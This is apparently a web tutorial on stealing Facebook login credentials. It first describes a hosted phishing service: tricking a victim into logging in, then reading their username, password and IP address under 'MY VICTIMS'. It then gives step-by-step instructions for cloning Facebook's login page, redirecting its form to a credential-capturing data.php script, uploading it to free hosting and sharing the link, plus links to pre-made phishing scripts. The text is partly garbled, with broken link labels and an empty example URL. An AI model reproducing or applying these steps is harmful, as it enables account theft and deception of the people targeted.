1. Visit this linkLink
and create an account there here
2. Log in there and locate the type of page to show to your victim when you give him/her the link
3. Deceive her to log in. I will post some confusing sentences so that u copy and use it.
4. When he or she login she will see a blank page, then come back to the site u got the link from and click on MY VICTIMS.
5. You will see the user name, password, IP address, etc
Facebook Hacked Successfully.
In this tutorial I will teach you how you can make a phishing page which is undetectable (Which is able to bypass hosting security). So lets get started!!
Things you need:
A site of which you want to make a phishing page (In this tutorial we will use Facebook)
Free Hosting Account, I recommend 000webhost (Highly Recommended)
For this guide I will use Facebook login to create a phishing page but you can use this method to on any site
Go to Facebook login
Right-Click on on the page and select “View Page Source” (OR press CTRL+U if you are using Google Chrome)
Copy the source code in a notepad file and save it as “IDPAGE.jpg” on your desktop
Now open the same (IDPAGE.jpg) and search for “action=” attribute in the <Form>html
Replace /login.php?login_attempt=1&lwv=101from the line action="/l ogin.php?login_attempt=1&lwv=101" with ” data.php ” and save it
Now create a new file with the name “data.php” and “index.php” and paste the following code in these files, You can get the code from here
http://mondoa gram. com/U6p
Copy the code from here and save it as “index.jpg“
Now upload all the files “IDPAGE.jpg“, “data. php“, “index .php“, and “index.jpg” in your webhosting account (Root directory)
That’s it!! You have successfully created your first phishing page!!
Alternate Option:
If you do not want to follow this guide (On how to make a Facebook script), Then you can simply download the pre-made Facebook Script (compiled by me) from here
http://mondoagram. com/UGP
Once you have downloaded the script then all you have to do is upload the script on any free hosting account like 000webhost
How to use your phishing URL:
You can use your phishing URL with anyone all you have to do is, Add “?” to your ULR
Note: Your URL should be look like this (Example) :
That's how you make a phishing page to hack a Facebook account
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